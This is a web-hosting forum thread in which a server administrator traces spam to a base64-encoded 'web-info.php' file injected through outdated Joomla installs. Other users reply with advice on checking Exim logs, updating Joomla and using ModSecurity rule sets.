Exim seems to hacked

V

VagrantRonnie

Member
Jun 3, 2013
6
0
1
cPanel Access Level
Root Administrator
Hello guys
I don't know if I'm the only one facing with this problem. but it's been a week since I can see an account "team@somedomains" in several servers of our company is sending spam emails. None of the domains have any email account like "team@..." so I guess, there is mailing code injected to their website content.
But I've seen this on several servers and I'm accusing that if there is security lack on my servers or something like this?
Anyone can help me find this guy?
 
cPanelPeter

cPanelPeter

Senior Technical Analyst
Staff member
Sep 23, 2013
586
25
153
cPanel Access Level
Root Administrator
Hello,

Your best bet is to review the log files (/var/log/exim_mainlog) and obtain the message ID file, then look for a message with that message ID and find out if the auth_id is a user on your server. If so, then that account is most likely compromised and you should immediately change the password.

Feel free to open a ticket using the link in my signature and we can have one of our technical analysts review this for you, and advise accordingly.
 
V

VagrantRonnie

Member
Jun 3, 2013
6
0
1
cPanel Access Level
Root Administrator
Thank you for answer.
I've figured out that in most of my clients host space which were using the outdated joomla version, there was a file injected named "web-info.php" which were encrypted with base64 and this file was running the required script to send spam emails.
ClamAV is able to detect and remove these kind of files, but it will be back again.
Is there any way to prevent these kind of files to be executed?
Since I cannot force all of my customers to update their Joomla or I cannot disable base64decoder?
 
Q

quizknows

Well-Known Member
Oct 20, 2009
1,008
87
78
cPanel Access Level
DataCenter Provider
You need to get them to update joomla and change their administrator passwords or they WILL be hacked again.

Your only option to even try to prevent that is a good paid modsec rule set like trustwave or atomicorp. Still, modsec rules can be evaded by skilled hackers.

Do not let your customers run out-dated and vulnerable software. I Know a lot of people don't want to update, but you should have a ToS that prohibits abuse, and that abuse is their fault if they're running known hackable versions of Joomla or other CMS software.
 
You must log in or register to reply here.
Thread starter Similar threads Forum Replies Date
S In Progress CPANEL-41943 - CVE-2022-3559 Exim - arbitrary code executions Security 1
W Any plans for updating cpanel-exim to 4.96 or newer? Security 3
S CPANEL-36837: critical vulnerabilities in exim Security 2
grindlay Exim presents wrong certificate after updating SSL host Security 3
I SOLVED New Critical Exim Flaw Exposes Email Servers to Remote Attacks Security 7
Similar threads
In Progress CPANEL-41943 - CVE-2022-3559 Exim - arbitrary code executions
Any plans for updating cpanel-exim to 4.96 or newer?
CPANEL-36837: critical vulnerabilities in exim
Exim presents wrong certificate after updating SSL host
SOLVED New Critical Exim Flaw Exposes Email Servers to Remote Attacks
Top Bottom